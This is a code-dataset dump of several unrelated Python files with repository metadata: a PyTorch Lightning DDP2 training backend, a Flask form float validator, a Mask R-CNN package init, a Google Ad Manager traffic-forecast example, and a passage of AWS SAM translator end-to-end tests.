from apex import amp
except ImportError:
amp = None
class DDP2Backend(Accelerator):
def __init__(self, trainer):
super().__init__(trainer)
self.task_idx = None
def setup(self, model):
self._resolve_task_idx()
self.trainer.model = model
def _resolve_task_idx(self):
if self.trainer.is_slurm_managing_tasks:
self.task_idx = int(os.environ['SLURM_LOCALID'])
else:
# torchelastic or general non_slurm ddp2
try:
self.task_idx = int(os.environ['LOCAL_RANK'])
            except Exception:
m = 'ddp2 only works in SLURM or via torchelastic with the WORLD_SIZE, LOCAL_RANK, GROUP_RANK flags'
raise MisconfigurationException(m)
def train(self):
model = self.trainer.model
self.ddp_train(process_idx=self.task_idx, mp_queue=None, model=model)
def ddp_train(self, process_idx, mp_queue, model, is_master=False, proc_offset=0):
"""
Entry point for ddp
Args:
process_idx:
mp_queue: multiprocessing queue
model:
is_master:
proc_offset:
Returns:
"""
# offset the process id if requested
process_idx = process_idx + proc_offset
# show progressbar only on progress_rank 0
if (self.trainer.node_rank != 0 or process_idx != 0) and self.trainer.progress_bar_callback is not None:
self.trainer.progress_bar_callback.disable()
self.trainer.local_rank = self.trainer.node_rank
self.trainer.global_rank = self.trainer.node_rank
self.trainer.world_size = self.trainer.num_nodes
# set warning rank
rank_zero_only.rank = self.trainer.global_rank
# set up server using proc 0's ip address
# try to init for 20 times at max in case ports are taken
# where to store ip_table
model.trainer = self.trainer
model.init_ddp_connection(
self.trainer.global_rank,
self.trainer.world_size,
self.trainer.is_slurm_managing_tasks
)
# call setup after the ddp process has connected
self.trainer.call_setup_hook(model)
        # on global rank zero let everyone know training is starting
if self.trainer.is_global_zero:
log.info('-' * 100)
log.info(f'distributed_backend={self.trainer.distributed_backend}')
log.info(f'All DDP processes registered. Starting ddp with {self.trainer.world_size} processes')
log.info('-' * 100)
# MODEL
# copy model to each gpu
if self.trainer.on_gpu:
gpu_idx = process_idx
# when using ddp, the master process (proc 0) continues running as the main one
# this means that the local rank will always be 0
# (even if cuda visible devices has other visible gpus)
# this means that the master process needs to pull the 0th visible index as the device number
if is_master:
available_gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
gpu_idx = int(available_gpus[self.trainer.local_rank])
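                # illustrative values: with CUDA_VISIBLE_DEVICES='2,3' the
                # master process (local_rank 0) selects physical GPU 2 here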
self.trainer.root_gpu = gpu_idx
torch.cuda.set_device(self.trainer.root_gpu)
model.cuda(self.trainer.root_gpu)
# CHOOSE OPTIMIZER
# allow for lr schedulers as well
optimizers, lr_schedulers, optimizer_frequencies = self.trainer.init_optimizers(model)
self.trainer.optimizers = optimizers
self.trainer.lr_schedulers = lr_schedulers
self.trainer.optimizer_frequencies = optimizer_frequencies
# set model properties before going into wrapper
self.trainer.copy_trainer_model_properties(model)
# AMP - run through amp wrapper before going to distributed DP
if self.trainer.amp_backend == AMPType.APEX:
model, optimizers = model.configure_apex(amp, model, self.trainer.optimizers, self.trainer.amp_level)
self.trainer.optimizers = optimizers
self.trainer.reinit_scheduler_properties(self.trainer.optimizers, self.trainer.lr_schedulers)
# DDP2 uses all GPUs on the machine
device_ids = self.trainer.data_parallel_device_ids
# allow user to configure ddp
model = model.configure_ddp(model, device_ids)
# set up training routine
self.trainer.setup_training(model)
# train or test
results = self.trainer.train_or_test()
# get original model
model = self.trainer.get_model()
# persist info in ddp_spawn
self.trainer.transfer_distrib_spawn_state_on_fit_end(model, mp_queue, results)
# clean up memory
torch.cuda.empty_cache()
def training_step(self, args):
if self.trainer.amp_backend == AMPType.NATIVE:
with torch.cuda.amp.autocast():
output = self.trainer.model(*args)
else:
output = self.trainer.model(*args)
return output
def validation_step(self, args):
output = self.training_step(args)
return output
def test_step(self, args):
output = self.training_step(args)
return output
def training_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
def validation_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
def test_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
| 34.70202
| 116
| 0.666715
|
import os
import torch
from pytorch_lightning import _logger as log
from pytorch_lightning.utilities import AMPType
from pytorch_lightning.utilities.distributed import rank_zero_only
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.accelerators.base_backend import Accelerator
try:
from hydra.utils import to_absolute_path, get_original_cwd
from hydra.core.hydra_config import HydraConfig
except ImportError:
HYDRA_AVAILABLE = False
else:
HYDRA_AVAILABLE = True
try:
from apex import amp
except ImportError:
amp = None
class DDP2Backend(Accelerator):
def __init__(self, trainer):
super().__init__(trainer)
self.task_idx = None
def setup(self, model):
self._resolve_task_idx()
self.trainer.model = model
def _resolve_task_idx(self):
if self.trainer.is_slurm_managing_tasks:
self.task_idx = int(os.environ['SLURM_LOCALID'])
else:
try:
self.task_idx = int(os.environ['LOCAL_RANK'])
            except Exception:
m = 'ddp2 only works in SLURM or via torchelastic with the WORLD_SIZE, LOCAL_RANK, GROUP_RANK flags'
raise MisconfigurationException(m)
def train(self):
model = self.trainer.model
self.ddp_train(process_idx=self.task_idx, mp_queue=None, model=model)
def ddp_train(self, process_idx, mp_queue, model, is_master=False, proc_offset=0):
process_idx = process_idx + proc_offset
if (self.trainer.node_rank != 0 or process_idx != 0) and self.trainer.progress_bar_callback is not None:
self.trainer.progress_bar_callback.disable()
self.trainer.local_rank = self.trainer.node_rank
self.trainer.global_rank = self.trainer.node_rank
self.trainer.world_size = self.trainer.num_nodes
rank_zero_only.rank = self.trainer.global_rank
# try to init for 20 times at max in case ports are taken
# where to store ip_table
model.trainer = self.trainer
model.init_ddp_connection(
self.trainer.global_rank,
self.trainer.world_size,
self.trainer.is_slurm_managing_tasks
)
# call setup after the ddp process has connected
self.trainer.call_setup_hook(model)
        # on global rank zero let everyone know training is starting
if self.trainer.is_global_zero:
log.info('-' * 100)
log.info(f'distributed_backend={self.trainer.distributed_backend}')
log.info(f'All DDP processes registered. Starting ddp with {self.trainer.world_size} processes')
log.info('-' * 100)
# MODEL
# copy model to each gpu
if self.trainer.on_gpu:
gpu_idx = process_idx
# when using ddp, the master process (proc 0) continues running as the main one
# this means that the local rank will always be 0
# (even if cuda visible devices has other visible gpus)
# this means that the master process needs to pull the 0th visible index as the device number
if is_master:
available_gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
gpu_idx = int(available_gpus[self.trainer.local_rank])
self.trainer.root_gpu = gpu_idx
torch.cuda.set_device(self.trainer.root_gpu)
model.cuda(self.trainer.root_gpu)
# CHOOSE OPTIMIZER
# allow for lr schedulers as well
optimizers, lr_schedulers, optimizer_frequencies = self.trainer.init_optimizers(model)
self.trainer.optimizers = optimizers
self.trainer.lr_schedulers = lr_schedulers
self.trainer.optimizer_frequencies = optimizer_frequencies
# set model properties before going into wrapper
self.trainer.copy_trainer_model_properties(model)
# AMP - run through amp wrapper before going to distributed DP
if self.trainer.amp_backend == AMPType.APEX:
model, optimizers = model.configure_apex(amp, model, self.trainer.optimizers, self.trainer.amp_level)
self.trainer.optimizers = optimizers
self.trainer.reinit_scheduler_properties(self.trainer.optimizers, self.trainer.lr_schedulers)
# DDP2 uses all GPUs on the machine
device_ids = self.trainer.data_parallel_device_ids
# allow user to configure ddp
model = model.configure_ddp(model, device_ids)
# set up training routine
self.trainer.setup_training(model)
# train or test
results = self.trainer.train_or_test()
# get original model
model = self.trainer.get_model()
# persist info in ddp_spawn
self.trainer.transfer_distrib_spawn_state_on_fit_end(model, mp_queue, results)
# clean up memory
torch.cuda.empty_cache()
def training_step(self, args):
if self.trainer.amp_backend == AMPType.NATIVE:
with torch.cuda.amp.autocast():
output = self.trainer.model(*args)
else:
output = self.trainer.model(*args)
return output
def validation_step(self, args):
output = self.training_step(args)
return output
def test_step(self, args):
output = self.training_step(args)
return output
def training_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
def validation_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
def test_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
| true
| true
|
1c40bd1f8437ddf4868c4190e8316bf496f69d27
| 520
|
py
|
Python
|
src/flaskFormRequest/validators/float.py
|
edcilo/flaskFormRequest
|
5d346ab8821bdc6653dab9607f8a5d3d992b59d9
|
[
"MIT"
] | null | null | null |
src/flaskFormRequest/validators/float.py
|
edcilo/flaskFormRequest
|
5d346ab8821bdc6653dab9607f8a5d3d992b59d9
|
[
"MIT"
] | null | null | null |
src/flaskFormRequest/validators/float.py
|
edcilo/flaskFormRequest
|
5d346ab8821bdc6653dab9607f8a5d3d992b59d9
|
[
"MIT"
] | null | null | null |
from typing import Union
from .validator import Validator, ValidationError, StopValidation
class Float(Validator):
def __init__(self, message: Union[str, None] = None, parse: bool = True) -> None:
self.parse = parse
        self.message = message or 'This field must be a float number.'
def parse_data(self, value):
return float(value)
def handler(self, value, field, request):
try:
value = float(value)
        except (TypeError, ValueError):
raise StopValidation(self.message)
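# Hypothetical usage sketch (not part of the original module), assuming the
# form-request machinery calls handler() with the raw field value:
#
#     validator = Float(message='Price must be a number.')
#     validator.handler('3.14', field=None, request=None)  # accepted
#     validator.handler('abc', field=None, request=None)   # raises StopValidation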
| 28.888889
| 85
| 0.648077
|
from typing import Union
from .validator import Validator, ValidationError, StopValidation
class Float(Validator):
def __init__(self, message: Union[str, None] = None, parse: bool = True) -> None:
self.parse = parse
        self.message = message or 'This field must be a float number.'
def parse_data(self, value):
return float(value)
def handler(self, value, field, request):
try:
value = float(value)
        except (TypeError, ValueError):
raise StopValidation(self.message)
| true
| true
|
1c40be8ea064575dc414f4074b3d5a872bc46e73
| 243
|
py
|
Python
|
chainer_mask_rcnn/functions/__init__.py
|
m3at/chainer-mask-rcnn
|
fa491663675cdc97974008becc99454d5e6e1d09
|
[
"MIT"
] | 61
|
2018-04-04T07:09:32.000Z
|
2021-11-12T19:54:23.000Z
|
chainer_mask_rcnn/functions/__init__.py
|
Swall0w/chainer-mask-rcnn
|
83366fc77e52aa6a29cfac4caa697d8b45dcffc6
|
[
"MIT"
] | 15
|
2018-04-10T10:48:47.000Z
|
2021-05-20T10:00:42.000Z
|
chainer_mask_rcnn/functions/__init__.py
|
Swall0w/chainer-mask-rcnn
|
83366fc77e52aa6a29cfac4caa697d8b45dcffc6
|
[
"MIT"
] | 18
|
2018-07-06T10:13:56.000Z
|
2022-03-02T12:25:31.000Z
|
# flake8: noqa
from .affine_channel_2d import affine_channel_2d
from .affine_channel_2d import AffineChannel2DFunction
from .crop_and_resize import crop_and_resize
from .roi_align_2d import roi_align_2d
from .roi_align_2d import ROIAlign2D
| 24.3
| 54
| 0.864198
|
from .affine_channel_2d import affine_channel_2d
from .affine_channel_2d import AffineChannel2DFunction
from .crop_and_resize import crop_and_resize
from .roi_align_2d import roi_align_2d
from .roi_align_2d import ROIAlign2D
| true
| true
|
1c40beeed5dbae5ac4bcf3d3ba9bff6de8b12127
| 3,988
|
py
|
Python
|
examples/ad_manager/v202011/forecast_service/get_traffic_data.py
|
siilats/googleads-python-lib
|
d82a9cb75a4b2d602d02039536443f5b30157a43
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202011/forecast_service/get_traffic_data.py
|
siilats/googleads-python-lib
|
d82a9cb75a4b2d602d02039536443f5b30157a43
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202011/forecast_service/get_traffic_data.py
|
siilats/googleads-python-lib
|
d82a9cb75a4b2d602d02039536443f5b30157a43
|
[
"Apache-2.0"
] | 1
|
2021-06-23T09:15:34.000Z
|
2021-06-23T09:15:34.000Z
|
#!/usr/bin/env python
#
# Copyright 2020, Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets the forecasted run-of-network traffic data."""
import datetime
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
forecast_service = client.GetService('ForecastService', version='v202011')
network_service = client.GetService('NetworkService', version='v202011')
# get the root ad unit ID to target the entire network.
root_ad_unit_id = network_service.getCurrentNetwork()['effectiveRootAdUnitId']
# Create a start date that's 7 days in the past and an end date that's 7 days
# in the future.
today = datetime.date.today()
start_date = today - datetime.timedelta(days=7)
end_date = today + datetime.timedelta(days=7)
# Create targeting.
targeting = {
'inventoryTargeting': {
'targetedAdUnits': [
{
'includeDescendants': True,
'adUnitId': root_ad_unit_id,
}
]
}
}
# Request the traffic forecast data.
traffic_data = forecast_service.getTrafficData({
'targeting': targeting,
'requestedDateRange': {
'startDate': start_date,
'endDate': end_date
}
})
# Display historical data.
historical_time_series = traffic_data['historicalTimeSeries']
if historical_time_series is None:
print('No historical data to display.')
else:
historical_start_date, historical_end_date = GetDatesFromForecastTimeSeries(
historical_time_series)
print('Historical Data:')
offset = 0
current_date = historical_start_date
while current_date <= historical_end_date:
print('%s: %d' % (current_date.isoformat(),
historical_time_series['values'][offset]))
offset += 1
current_date = historical_start_date + datetime.timedelta(days=offset)
# Display forecasted data.
forecasted_time_series = traffic_data['forecastedTimeSeries']
if forecasted_time_series is None:
print('No forecasted data to display.')
else:
forecasted_start_date, forecasted_end_date = GetDatesFromForecastTimeSeries(
forecasted_time_series)
print('Forecasted Data:')
offset = 0
current_date = forecasted_start_date
while current_date <= forecasted_end_date:
print('%s: %d' % (current_date.isoformat(),
forecasted_time_series['values'][offset]))
offset += 1
current_date = forecasted_start_date + datetime.timedelta(days=offset)
def GetDatesFromForecastTimeSeries(time_series):
"""Creates datetime.date objects from a forecast time series object.
Args:
time_series: The forecast time series containing start and end date info.
Returns:
A tuple of datetime.date objects, the first representing the start date and
the second representing the end date.
"""
date_range = time_series['timeSeriesDateRange']
start_date = datetime.date(
date_range['startDate']['year'],
date_range['startDate']['month'],
date_range['startDate']['day']
)
end_date = datetime.date(
date_range['endDate']['year'],
date_range['endDate']['month'],
date_range['endDate']['day']
)
return start_date, end_date
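# Illustration (hypothetical values): the shape this helper expects, showing
# only the fields read above.
#
#     _series = {'timeSeriesDateRange': {
#         'startDate': {'year': 2020, 'month': 1, 'day': 1},
#         'endDate': {'year': 2020, 'month': 1, 'day': 15}}}
#     GetDatesFromForecastTimeSeries(_series)
#     # -> (datetime.date(2020, 1, 1), datetime.date(2020, 1, 15))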
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
| 32.16129
| 80
| 0.701354
|
import datetime
from googleads import ad_manager
def main(client):
forecast_service = client.GetService('ForecastService', version='v202011')
network_service = client.GetService('NetworkService', version='v202011')
root_ad_unit_id = network_service.getCurrentNetwork()['effectiveRootAdUnitId']
today = datetime.date.today()
start_date = today - datetime.timedelta(days=7)
end_date = today + datetime.timedelta(days=7)
targeting = {
'inventoryTargeting': {
'targetedAdUnits': [
{
'includeDescendants': True,
'adUnitId': root_ad_unit_id,
}
]
}
}
traffic_data = forecast_service.getTrafficData({
'targeting': targeting,
'requestedDateRange': {
'startDate': start_date,
'endDate': end_date
}
})
historical_time_series = traffic_data['historicalTimeSeries']
if historical_time_series is None:
print('No historical data to display.')
else:
historical_start_date, historical_end_date = GetDatesFromForecastTimeSeries(
historical_time_series)
print('Historical Data:')
offset = 0
current_date = historical_start_date
while current_date <= historical_end_date:
print('%s: %d' % (current_date.isoformat(),
historical_time_series['values'][offset]))
offset += 1
current_date = historical_start_date + datetime.timedelta(days=offset)
forecasted_time_series = traffic_data['forecastedTimeSeries']
if forecasted_time_series is None:
print('No forecasted data to display.')
else:
forecasted_start_date, forecasted_end_date = GetDatesFromForecastTimeSeries(
forecasted_time_series)
print('Forecasted Data:')
offset = 0
current_date = forecasted_start_date
while current_date <= forecasted_end_date:
print('%s: %d' % (current_date.isoformat(),
forecasted_time_series['values'][offset]))
offset += 1
current_date = forecasted_start_date + datetime.timedelta(days=offset)
def GetDatesFromForecastTimeSeries(time_series):
date_range = time_series['timeSeriesDateRange']
start_date = datetime.date(
date_range['startDate']['year'],
date_range['startDate']['month'],
date_range['startDate']['day']
)
end_date = datetime.date(
date_range['endDate']['year'],
date_range['endDate']['month'],
date_range['endDate']['day']
)
return start_date, end_date
if __name__ == '__main__':
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
| true
| true
|
1c40bf9d2019a68825eb40f035446d1a2fc35654
| 35,667
|
py
|
Python
|
tests/translator/test_translator.py
|
Buffer0x7cd/serverless-application-model
|
805cc85bc26cfda16e9611c047e38f78560ad6e6
|
[
"Apache-2.0"
] | 2
|
2019-04-13T16:57:10.000Z
|
2019-12-13T08:32:16.000Z
|
tests/translator/test_translator.py
|
Buffer0x7cd/serverless-application-model
|
805cc85bc26cfda16e9611c047e38f78560ad6e6
|
[
"Apache-2.0"
] | 3
|
2021-06-08T22:29:43.000Z
|
2022-01-13T03:21:16.000Z
|
tests/translator/test_translator.py
|
Buffer0x7cd/serverless-application-model
|
805cc85bc26cfda16e9611c047e38f78560ad6e6
|
[
"Apache-2.0"
] | 1
|
2021-08-05T13:35:20.000Z
|
2021-08-05T13:35:20.000Z
|
import json
import itertools
import os.path
import hashlib
import sys
from functools import reduce, cmp_to_key
from samtranslator.translator.translator import Translator, prepare_plugins, make_policy_template_for_function_plugin
from samtranslator.parser.parser import Parser
from samtranslator.model.exceptions import InvalidDocumentException, InvalidResourceException
from samtranslator.model import Resource
from samtranslator.model.sam_resources import SamSimpleTable
from samtranslator.public.plugins import BasePlugin
from tests.translator.helpers import get_template_parameter_values
from tests.plugins.application.test_serverless_app_plugin import mock_get_region
from samtranslator.yaml_helper import yaml_parse
from parameterized import parameterized, param
import pytest
import yaml
from unittest import TestCase
from samtranslator.translator.transform import transform
from mock import Mock, MagicMock, patch
BASE_PATH = os.path.dirname(__file__)
INPUT_FOLDER = BASE_PATH + '/input'
OUTPUT_FOLDER = BASE_PATH + '/output'
# Do not sort AWS::Serverless::Function Layers Property.
# Order of Layers is an important attribute and shouldn't be changed.
DO_NOT_SORT = ['Layers']
BASE_PATH = os.path.dirname(__file__)
INPUT_FOLDER = os.path.join(BASE_PATH, 'input')
OUTPUT_FOLDER = os.path.join(BASE_PATH, 'output')
def deep_sort_lists(value):
"""
Custom sorting implemented as a wrapper on top of Python's built-in ``sorted`` method. This is necessary because
the previous behavior assumed lists were unordered. As part of migration to Py3, we are trying to
retain the same behavior. But in Py3, lists with complex data types like dict cannot be sorted. Hence
we provide a custom sort function that tries best sort the lists in a stable order. The actual order
does not matter as long as it is stable between runs.
This implementation assumes that the input was parsed from a JSON data. So it can have one of the
following types: a primitive type, list or other dictionaries.
We traverse the dictionary like how we would traverse a tree. If a value is a list, we recursively sort the members
of the list, and then sort the list itself.
This assumption that lists are unordered is a problem at the first place. As part of dropping support for Python2,
we should remove this assumption. We have to update SAM Translator to output lists in a predictable ordering so we
can assume lists are ordered and compare them.
"""
if isinstance(value, dict):
return {k: deep_sort_lists(v) for k, v in value.items()}
if isinstance(value, list):
if sys.version_info.major < 3:
# Py2 can sort lists with complex types like dictionaries
return sorted((deep_sort_lists(x) for x in value))
else:
# Py3 cannot sort lists with complex types. Hence a custom comparator function
return sorted((deep_sort_lists(x) for x in value), key=cmp_to_key(custom_list_data_comparator))
else:
return value
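# Illustration (added, not in the original file): two orderings of the same
# members normalize to an identical structure, which is all the output
# comparison in the tests below relies on:
#
#     deep_sort_lists([{'b': 2}, {'a': 1}]) == deep_sort_lists([{'a': 1}, {'b': 2}])  # True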
def custom_list_data_comparator(obj1, obj2):
"""
Comparator function used to sort lists with complex data types in them. This is meant to be used only within the
context of sorting lists for use with unit tests.
Given any two objects, this function will return the "difference" between the two objects. This difference obviously
does not make sense for complex data types like dictionaries & list. This function implements a custom logic that
is partially borrowed from Python2's implementation of such a comparison:
* Both objects are dict: Convert them JSON strings and compare
* Both objects are comparable data types (ie. ones that have > and < operators): Compare them directly
* Objects are non-comparable (ie. one is a dict other is a list): Compare the names of the data types.
ie. dict < list because of alphabetical order. This is Python2's behavior.
"""
if isinstance(obj1, dict) and isinstance(obj2, dict):
obj1 = json.dumps(obj1, sort_keys=True)
obj2 = json.dumps(obj2, sort_keys=True)
try:
return (obj1 > obj2) - (obj1 < obj2)
# In Py3 a TypeError will be raised if obj1 and obj2 are different types or uncomparable
except TypeError:
s1, s2 = type(obj1).__name__, type(obj2).__name__
return (s1 > s2) - (s1 < s2)
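# Illustration: non-comparable operands fall back to their type names, so a
# dict sorts before a list ('dict' < 'list'):
#
#     custom_list_data_comparator({'a': 1}, [1, 2])  # -> -1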
def mock_sar_service_call(self, service_call_function, logical_id, *args):
"""
Current implementation: args[0] is always the application_id
"""
application_id = args[0]
status = 'ACTIVE'
if application_id == "no-access":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == "non-existent":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == "invalid-semver":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == 1:
raise InvalidResourceException(logical_id, "Type of property 'ApplicationId' is invalid.".format(application_id))
elif application_id == "preparing" and self._wait_for_template_active_status < 2:
self._wait_for_template_active_status += 1
self.SLEEP_TIME_SECONDS = 0
self.TEMPLATE_WAIT_TIMEOUT_SECONDS = 2
status = "PREPARING"
elif application_id == "preparing-never-ready":
self._wait_for_template_active_status = True
self.SLEEP_TIME_SECONDS = 0
self.TEMPLATE_WAIT_TIMEOUT_SECONDS = 0
status = "PREPARING"
elif application_id == "expired":
status = "EXPIRED"
message = {
'ApplicationId': args[0],
'CreationTime': 'x',
'ExpirationTime': 'x',
'SemanticVersion': '1.1.1',
'Status': status,
'TemplateId': 'id-xx-xx',
'TemplateUrl': 'https://awsserverlessrepo-changesets-xxx.s3.amazonaws.com/signed-url'
}
return message
# implicit_api, explicit_api, explicit_api_ref, api_cache tests currently have deployment IDs hardcoded in output file.
# These ids are generated using sha1 hash of the swagger body for implicit
# api and s3 location for explicit api.
class TestTranslatorEndToEnd(TestCase):
@parameterized.expand(
itertools.product([
's3_with_condition',
'function_with_condition',
'basic_function',
'basic_application',
'application_preparing_state',
'basic_layer',
'cloudwatchevent',
'cloudwatch_logs_with_ref',
'cloudwatchlog',
'streams',
'sqs',
'simpletable',
'simpletable_with_sse',
'implicit_api',
'explicit_api',
'api_endpoint_configuration',
'api_with_auth_all_maximum',
'api_with_auth_all_minimum',
'api_with_auth_no_default',
'api_with_method_settings',
'api_with_binary_media_types',
'api_with_minimum_compression_size',
'api_with_resource_refs',
'api_with_cors',
'api_with_cors_and_only_methods',
'api_with_cors_and_only_headers',
'api_with_cors_and_only_origins',
'api_with_cors_and_only_maxage',
'api_with_cors_and_only_credentials_false',
'api_with_cors_no_definitionbody',
'api_cache',
'api_with_access_log_setting',
'api_with_canary_setting',
'api_with_xray_tracing',
's3',
's3_create_remove',
's3_existing_lambda_notification_configuration',
's3_existing_other_notification_configuration',
's3_filter',
's3_multiple_events_same_bucket',
's3_multiple_functions',
's3_with_dependsOn',
'sns',
'sns_existing_other_subscription',
'sns_topic_outside_template',
'alexa_skill',
'alexa_skill_with_skill_id',
'iot_rule',
'layers_with_intrinsics',
'layers_all_properties',
'function_managed_inline_policy',
'unsupported_resources',
'intrinsic_functions',
'basic_function_with_tags',
'depends_on',
'function_event_conditions',
'function_with_dlq',
'function_with_kmskeyarn',
'function_with_alias',
'function_with_alias_intrinsics',
'function_with_disabled_deployment_preference',
'function_with_deployment_preference',
'function_with_deployment_preference_all_parameters',
'function_with_deployment_preference_multiple_combinations',
'function_with_alias_and_event_sources',
'function_with_resource_refs',
'function_with_deployment_and_custom_role',
'function_with_deployment_no_service_role',
'function_with_global_layers',
'function_with_layers',
'function_with_many_layers',
'function_with_permissions_boundary',
'function_with_policy_templates',
'function_with_sns_event_source_all_parameters',
'globals_for_function',
'globals_for_api',
'globals_for_simpletable',
'all_policy_templates',
'simple_table_ref_parameter_intrinsic',
'simple_table_with_table_name',
'function_concurrency',
'simple_table_with_extra_tags',
'explicit_api_with_invalid_events_config',
'no_implicit_api_with_serverless_rest_api_resource',
'implicit_api_with_serverless_rest_api_resource',
'implicit_api_with_auth_and_conditions_max',
'implicit_api_with_many_conditions',
'implicit_and_explicit_api_with_conditions',
'api_with_cors_and_conditions_no_definitionbody',
'api_with_auth_and_conditions_all_max'
],
[
("aws", "ap-southeast-1"),
("aws-cn", "cn-north-1"),
("aws-us-gov", "us-gov-west-1")
] # Run all the above tests against each of the list of partitions to test against
)
)
@patch('samtranslator.plugins.application.serverless_app_plugin.ServerlessAppPlugin._sar_service_call', mock_sar_service_call)
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_success(self, testcase, partition_with_region):
partition = partition_with_region[0]
region = partition_with_region[1]
manifest = yaml_parse(open(os.path.join(INPUT_FOLDER, testcase + '.yaml'), 'r'))
# To uncover unicode-related bugs, convert dict to JSON string and parse JSON back to dict
manifest = json.loads(json.dumps(manifest))
partition_folder = partition if partition != "aws" else ""
        expected = json.load(open(os.path.join(OUTPUT_FOLDER, partition_folder, testcase + '.json'), 'r'))
with patch('boto3.session.Session.region_name', region):
parameter_values = get_template_parameter_values()
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {
'AWSLambdaBasicExecutionRole': 'arn:{}:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole'.format(partition),
'AmazonDynamoDBFullAccess': 'arn:{}:iam::aws:policy/AmazonDynamoDBFullAccess'.format(partition),
'AmazonDynamoDBReadOnlyAccess': 'arn:{}:iam::aws:policy/AmazonDynamoDBReadOnlyAccess'.format(partition),
'AWSLambdaRole': 'arn:{}:iam::aws:policy/service-role/AWSLambdaRole'.format(partition),
}
output_fragment = transform(
manifest, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
# Only update the deployment Logical Id hash in Py3.
if sys.version_info.major >= 3:
self._update_logical_id_hash(expected)
self._update_logical_id_hash(output_fragment)
assert deep_sort_lists(output_fragment) == deep_sort_lists(expected)
def _update_logical_id_hash(self, resources):
"""
Brute force method for updating all APIGW Deployment LogicalIds and references to a consistent hash
"""
output_resources = resources.get("Resources", {})
deployment_logical_id_dict = {}
rest_api_to_swagger_hash = {}
dict_of_things_to_delete = {}
# Find all RestApis in the template
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::RestApi" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
if "Body" in resource_properties:
self._generate_new_deployment_hash(logical_id, resource_properties.get("Body"), rest_api_to_swagger_hash)
elif "BodyS3Location" in resource_dict.get("Properties"):
self._generate_new_deployment_hash(logical_id,
resource_properties.get("BodyS3Location"),
rest_api_to_swagger_hash)
# Collect all APIGW Deployments LogicalIds and generate the new ones
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::Deployment" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
rest_id = resource_properties.get("RestApiId").get("Ref")
data_hash = rest_api_to_swagger_hash.get(rest_id)
description = resource_properties.get("Description")[:-len(data_hash)]
resource_properties["Description"] = description + data_hash
new_logical_id = logical_id[:-10] + data_hash[:10]
deployment_logical_id_dict[logical_id] = new_logical_id
dict_of_things_to_delete[logical_id] = (new_logical_id, resource_dict)
# Update References to APIGW Deployments
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::Stage" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
rest_id = resource_properties.get("RestApiId", {}).get("Ref", "")
data_hash = rest_api_to_swagger_hash.get(rest_id)
deployment_id = resource_properties.get("DeploymentId", {}).get("Ref")
new_logical_id = deployment_logical_id_dict.get(deployment_id, "")[:-10]
new_logical_id = new_logical_id + data_hash[:10]
resource_properties.get("DeploymentId", {})["Ref"] = new_logical_id
# To avoid mutating the template while iterating, delete only after find everything to update
for logical_id_to_remove, tuple_to_add in dict_of_things_to_delete.items():
output_resources[tuple_to_add[0]] = tuple_to_add[1]
del output_resources[logical_id_to_remove]
# Update any Output References in the template
for output_key, output_value in resources.get("Outputs", {}).items():
if output_value.get("Ref") in deployment_logical_id_dict:
output_value["Ref"] = deployment_logical_id_dict[output_value.get("Ref")]
def _generate_new_deployment_hash(self, logical_id, dict_to_hash, rest_api_to_swagger_hash):
data_bytes = json.dumps(dict_to_hash, separators=(',', ':'), sort_keys=True).encode("utf8")
data_hash = hashlib.sha1(data_bytes).hexdigest()
rest_api_to_swagger_hash[logical_id] = data_hash
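# Illustration: hashing the canonical JSON form (sorted keys, fixed
# separators) makes the digest independent of key order, e.g.
# json.dumps({'b': 1, 'a': 2}, separators=(',', ':'), sort_keys=True) and
# json.dumps({'a': 2, 'b': 1}, separators=(',', ':'), sort_keys=True) both
# produce '{"a":2,"b":1}' and therefore the same sha1 digest.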
@pytest.mark.parametrize('testcase', [
'error_api_duplicate_methods_same_path',
'error_api_invalid_auth',
'error_api_invalid_definitionuri',
'error_api_invalid_definitionbody',
'error_api_invalid_restapiid',
'error_application_properties',
'error_application_does_not_exist',
'error_application_no_access',
'error_application_preparing_timeout',
'error_cors_on_external_swagger',
'error_invalid_cors_dict',
'error_cors_credentials_true_with_wildcard_origin',
'error_cors_credentials_true_without_explicit_origin',
'error_function_invalid_codeuri',
'error_function_invalid_layer',
'error_function_no_codeuri',
'error_function_no_handler',
'error_function_no_runtime',
'error_function_with_deployment_preference_missing_alias',
'error_function_with_invalid_deployment_preference_hook_property',
'error_invalid_logical_id',
'error_layer_invalid_properties',
'error_missing_queue',
'error_missing_startingposition',
'error_missing_stream',
'error_multiple_resource_errors',
